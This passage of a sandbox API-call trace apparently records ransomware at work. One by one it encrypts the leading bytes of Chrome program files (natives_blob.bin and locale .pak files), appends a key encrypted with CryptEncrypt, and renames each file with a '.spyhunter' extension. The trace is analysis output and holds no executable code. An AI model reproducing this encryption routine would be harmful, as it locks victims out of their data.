hTemplateFile=0x0) returned 0xa0 [0175.649] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin") returned 83 [0175.649] StrStrW (lpFirst="natives_blob.bin", lpSrch=".txt") returned 0x0 [0175.650] GetProcessHeap () returned 0x2c0000 [0175.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.650] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4d4*=0x2800, lpOverlapped=0x0) returned 1 [0175.739] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.739] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4d4*=0x2800, lpOverlapped=0x0) returned 1 [0175.739] GetProcessHeap () returned 0x2c0000 [0175.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.740] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.740] WriteFile (in: hFile=0xa0, lpBuffer=0x57e514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x57e514*, lpNumberOfBytesWritten=0x57e4d4*=0x4, lpOverlapped=0x0) returned 1 [0175.763] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4d4*=0x30, lpOverlapped=0x0) returned 1 [0175.763] CloseHandle (hObject=0xa0) returned 1 [0175.763] GetProcessHeap () returned 0x2c0000 [0175.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.763] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin.spyhunter") returned 93 [0175.763] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin.spyhunter")) returned 1 [0175.764] GetProcessHeap () returned 0x2c0000 [0175.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.765] GetProcessHeap () returned 0x2c0000 [0175.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.765] GetProcessHeap () returned 0x2c0000 [0175.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece740 | out: hHeap=0x2c0000) returned 1 [0175.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e510 | out: pbBuffer=0x57e510) returned 1 [0175.765] GetProcessHeap () returned 0x2c0000 [0175.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e508*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e508*=0x30) returned 1 [0175.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak") returned 81 [0175.767] StrStrW (lpFirst="te.pak", lpSrch=".txt") returned 0x0 [0175.767] GetProcessHeap () returned 0x2c0000 [0175.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.767] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0175.785] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.785] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0175.785] GetProcessHeap () returned 0x2c0000 [0175.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.785] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.786] WriteFile (in: hFile=0xa0, lpBuffer=0x57e50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x57e50c*, lpNumberOfBytesWritten=0x57e4cc*=0x4, lpOverlapped=0x0) returned 1 [0175.795] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4cc*=0x30, lpOverlapped=0x0) returned 1 [0175.795] CloseHandle (hObject=0xa0) returned 1 [0175.802] GetProcessHeap () returned 0x2c0000 [0175.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.802] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak.spyhunter") returned 91 [0175.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak.spyhunter")) returned 1 [0175.803] GetProcessHeap () returned 0x2c0000 [0175.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.803] GetProcessHeap () returned 0x2c0000 [0175.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.803] GetProcessHeap () returned 0x2c0000 [0175.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece290 | out: hHeap=0x2c0000) returned 1 [0175.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e510 | out: pbBuffer=0x57e510) returned 1 [0175.803] GetProcessHeap () returned 0x2c0000 [0175.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.803] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e508*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e508*=0x30) returned 1 [0175.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.804] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak") returned 81 [0175.804] StrStrW (lpFirst="sv.pak", lpSrch=".txt") returned 0x0 [0175.804] GetProcessHeap () returned 0x2c0000 [0175.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.804] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0175.856] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.856] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0175.856] GetProcessHeap () returned 0x2c0000 [0175.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.857] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.857] WriteFile (in: hFile=0xa0, lpBuffer=0x57e50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x57e50c*, lpNumberOfBytesWritten=0x57e4cc*=0x4, lpOverlapped=0x0) returned 1 [0175.953] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4cc*=0x30, lpOverlapped=0x0) returned 1 [0175.953] CloseHandle (hObject=0xa0) returned 1 [0175.953] GetProcessHeap () returned 0x2c0000 [0175.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.953] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak.spyhunter") returned 91 [0175.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak.spyhunter")) returned 1 [0175.954] GetProcessHeap () returned 0x2c0000 [0175.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.954] GetProcessHeap () returned 0x2c0000 [0175.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.955] GetProcessHeap () returned 0x2c0000 [0175.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecdfc0 | out: hHeap=0x2c0000) returned 1 [0175.955] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e508 | out: pbBuffer=0x57e508) returned 1 [0175.955] GetProcessHeap () returned 0x2c0000 [0175.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.955] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e500*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e500*=0x30) returned 1 [0175.955] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.958] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak") returned 81 [0175.958] StrStrW (lpFirst="ro.pak", lpSrch=".txt") returned 0x0 [0175.958] GetProcessHeap () returned 0x2c0000 [0175.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.958] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4c4*=0x2800, lpOverlapped=0x0) returned 1 [0175.976] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.976] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4c4*=0x2800, lpOverlapped=0x0) returned 1 [0175.976] GetProcessHeap () returned 0x2c0000 [0175.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.976] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.976] WriteFile (in: hFile=0xa0, lpBuffer=0x57e504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x57e504*, lpNumberOfBytesWritten=0x57e4c4*=0x4, lpOverlapped=0x0) returned 1 [0176.032] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4c4*=0x30, lpOverlapped=0x0) returned 1 [0176.032] CloseHandle (hObject=0xa0) returned 1 [0176.103] GetProcessHeap () returned 0x2c0000 [0176.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.103] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak.spyhunter") returned 91 [0176.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak.spyhunter")) returned 1 [0176.105] GetProcessHeap () returned 0x2c0000 [0176.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.105] GetProcessHeap () returned 0x2c0000 [0176.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.105] GetProcessHeap () returned 0x2c0000 [0176.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecdaf0 | out: hHeap=0x2c0000) returned 1 [0176.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e508 | out: pbBuffer=0x57e508) returned 1 [0176.106] GetProcessHeap () returned 0x2c0000 [0176.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e500*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e500*=0x30) returned 1 [0176.106] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.107] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak") returned 81 [0176.107] StrStrW (lpFirst="nl.pak", lpSrch=".txt") returned 0x0 [0176.107] GetProcessHeap () returned 0x2c0000 [0176.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.107] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4c4*=0x2800, lpOverlapped=0x0) returned 1 [0176.128] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.128] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4c4*=0x2800, lpOverlapped=0x0) returned 1 [0176.128] GetProcessHeap () returned 0x2c0000 [0176.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.128] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.128] WriteFile (in: hFile=0x9c, lpBuffer=0x57e504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x57e504*, lpNumberOfBytesWritten=0x57e4c4*=0x4, lpOverlapped=0x0) returned 1 [0176.137] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4c4*=0x30, lpOverlapped=0x0) returned 1 [0176.137] CloseHandle (hObject=0x9c) returned 1 [0176.137] GetProcessHeap () returned 0x2c0000 [0176.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.138] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak.spyhunter") returned 91 [0176.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak.spyhunter")) returned 1 [0176.138] GetProcessHeap () returned 0x2c0000 [0176.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.139] GetProcessHeap () returned 0x2c0000 [0176.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.139] GetProcessHeap () returned 0x2c0000 [0176.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd910 | out: hHeap=0x2c0000) returned 1 [0176.139] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e500 | out: pbBuffer=0x57e500) returned 1 [0176.139] GetProcessHeap () returned 0x2c0000 [0176.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.139] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4f8*=0x30) returned 1 [0176.139] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.140] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak") returned 81 [0176.140] StrStrW (lpFirst="mr.pak", lpSrch=".txt") returned 0x0 [0176.140] GetProcessHeap () returned 0x2c0000 [0176.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.140] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0176.278] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.278] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0176.278] GetProcessHeap () returned 0x2c0000 [0176.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.278] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.278] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x57e4fc*, lpNumberOfBytesWritten=0x57e4bc*=0x4, lpOverlapped=0x0) returned 1 [0176.290] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4bc*=0x30, lpOverlapped=0x0) returned 1 [0176.290] CloseHandle (hObject=0x9c) returned 1 [0176.318] GetProcessHeap () returned 0x2c0000 [0176.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.318] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak.spyhunter") returned 91 [0176.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak.spyhunter")) returned 1 [0176.320] GetProcessHeap () returned 0x2c0000 [0176.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.320] GetProcessHeap () returned 0x2c0000 [0176.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.320] GetProcessHeap () returned 0x2c0000 [0176.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd640 | out: hHeap=0x2c0000) returned 1 [0176.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e500 | out: pbBuffer=0x57e500) returned 1 [0176.320] GetProcessHeap () returned 0x2c0000 [0176.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4f8*=0x30) returned 1 [0176.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.324] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak") returned 81 [0176.324] StrStrW (lpFirst="kn.pak", lpSrch=".txt") returned 0x0 [0176.324] GetProcessHeap () returned 0x2c0000 [0176.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.324] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0176.335] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.335] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0176.335] GetProcessHeap () returned 0x2c0000 [0176.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.336] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, 